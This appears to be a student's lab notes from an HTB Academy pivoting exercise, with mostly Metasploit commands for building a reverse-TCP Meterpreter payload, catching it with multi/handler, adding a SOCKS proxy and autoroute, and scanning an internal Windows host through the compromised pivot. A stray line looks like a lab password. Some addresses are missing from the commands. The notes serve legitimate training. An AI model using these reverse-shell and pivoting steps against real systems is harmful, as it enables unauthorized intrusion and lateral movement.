Skip to content

Meterpreter tunneling


  • we have our Meterpreter shell access on the Ubuntu server (the pivot host)
  • we want to perform enumeration scans through the pivot host, but we would like to take advantage of the conveniences that Meterpreter sessions

tmux env setup

tmux setenv LOCAL_IP
tmux setenv WIN_IP_NET_2

Step 1

Creating Payload for Ubuntu Pivot Host

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LOCAL_IP -f elf -o shell.elf LPORT=4444

Configuring & Starting the multi/handler

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LOCAL_IP; set lport 4444; exploit"

copy the shell.elf binary file to the Ubuntu pivot host over SSH

scp shell.elf ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST:~/
|<- HTB_@cademy_stdnt!

execute shell.elf to gain a Meterpreter session

chmod +x shell.elf

Step 2 - ping sweep

We know that the Windows target is on the network. So assuming that the firewall on the Windows target is allowing ICMP requests, we would want to perform a ping sweep on this network. We can do that using Meterpreter with the ping_sweep module, which will generate the ICMP traffic from the Ubuntu host to the network

Step 3 - proxy

Configuring MSF's SOCKS Proxy

use auxiliary/server/socks_proxy
set SRVPORT 9050
set version 4a

Confirming Proxy Server is Running


Adding a Line to proxychains.conf if Needed After initiating the SOCKS server, we will configure proxychains to route traffic generated by other tools like Nmap through our pivot on the compromised Ubuntu host. We can add the below line at the end of our proxychains.conf file located at /etc/proxychains.conf if it isn't already there.

socks4 9050

Step 4 - AutoRoute

Creating Routes with AutoRoute Finally, we need to tell our socks_proxy module to route all the traffic via our Meterpreter session. We can use the post/multi/manage/autoroute module from Metasploit to add routes for the subnet and then route all our proxychains traffic.

use post/multi/manage/autoroute

It is also possible to add routes with autoroute by running autoroute from the Meterpreter session.

run autoroute -s

Listing Active Routes with AutoRoute

sessions -i 1
meterpreter > run autoroute -p
Active Routing Table

   Subnet             Netmask            Gateway
   ------             -------            -------        Session 1      Session 1      Session 1
As you can see from the output above, the route has been added to the network. We will now be able to use proxychains to route our Nmap traffic via our Meterpreter session.

Step 5

Testing Proxy & Routing Functionality

proxychains nmap $WIN_IP_NET_2 -p3389 -sT -v -Pn